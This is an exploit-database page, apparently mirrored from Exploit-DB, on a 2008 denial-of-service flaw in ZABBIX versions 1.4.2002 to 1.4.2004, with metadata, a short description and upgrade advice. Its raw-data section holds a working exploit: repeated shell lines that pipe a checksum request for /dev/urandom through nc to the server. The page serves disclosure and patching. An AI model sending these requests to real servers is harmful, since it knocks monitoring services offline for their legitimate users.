header-logo
Suggest Exploit
vendor:
ZABBIX
by:
SecurityFocus
7.5
CVSS
HIGH
Denial-of-Service
400
CWE
Product Name: ZABBIX
Affected Version From: 1.4.2002
Affected Version To: 1.4.2004
Patch Exists: YES
Related CWE: N/A
CPE: a:zabbix:zabbix
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux
2008

ZABBIX Denial-of-Service Vulnerability

ZABBIX is prone to a denial-of-service vulnerability when handling specially crafted requests for file checksums. An attacker can exploit this issue to cause the affected application to stop responding, denying service to legitimate users. The exploit involves sending multiple requests for file checksums to the ZABBIX server using the 'nc' command.

Mitigation:

Upgrade to the latest version of ZABBIX or apply the appropriate patch.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/28244/info

ZABBIX is prone to a denial-of-service vulnerability when handling specially crafted requests for file checksums.

An attacker can exploit this issue to cause the affected application to stop responding, denying service to legitimate users.

echo "vfs.file.cksum[/dev/urandom]" | nc localhost
echo "vfs.file.cksum[/dev/urandom]" | nc localhost
echo "vfs.file.cksum[/dev/urandom]" | nc localhost

Navigation

Suggest Exploit

Services By CQR